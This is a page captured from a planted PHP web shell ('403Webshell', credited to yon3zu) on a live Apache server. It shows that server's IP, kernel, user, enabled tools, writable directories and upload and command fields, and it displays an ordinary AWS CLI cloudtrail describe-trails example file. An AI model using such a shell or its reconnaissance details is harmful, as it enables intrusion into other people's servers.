403Webshell
Server IP : 52.25.153.185  /  Your IP : 216.73.216.194
Web Server : Apache
System : Linux ip-172-26-6-158 5.10.0-45-cloud-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/awscli/examples/cloudtrail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3/dist-packages/awscli/examples/cloudtrail/describe-trails.rst
**To describe a trail**

The following ``describe-trails`` command returns the settings for ``Trail1`` and ``Trail2``::

  aws cloudtrail describe-trails --trail-name-list Trail1 Trail2

Output::

  {
   "trailList": [
       {
           "IncludeGlobalServiceEvents": true, 
           "Name": "Trail1", 
           "TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/Trail1", 
           "LogFileValidationEnabled": false, 
           "IsMultiRegionTrail": false, 
           "S3BucketName": "my-bucket", 
           "CloudWatchLogsRoleArn": "arn:aws:iam::123456789012:role/CloudTrail_CloudWatchLogs_Role", 
           "CloudWatchLogsLogGroupArn": "arn:aws:logs:us-east-1:123456789012:log-group:CloudTrail:*", 
           "SnsTopicName": "my-topic", 
           "HomeRegion": "us-east-1"
       }, 
       {
           "IncludeGlobalServiceEvents": true, 
           "Name": "Trail2", 
           "S3KeyPrefix": "my-prefix", 
           "TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/Trail2", 
           "LogFileValidationEnabled": false, 
           "IsMultiRegionTrail": false, 
           "S3BucketName": "my-bucket", 
           "KmsKeyId": "arn:aws:kms:us-east-1:123456789012:key/4c5ae5ac-3c13-421e-8335-c7868ef6a769", 
           "HomeRegion": "us-east-1"
       }
    ]
  }

Youez - 2016 - github.com/yon3zu
LinuXploit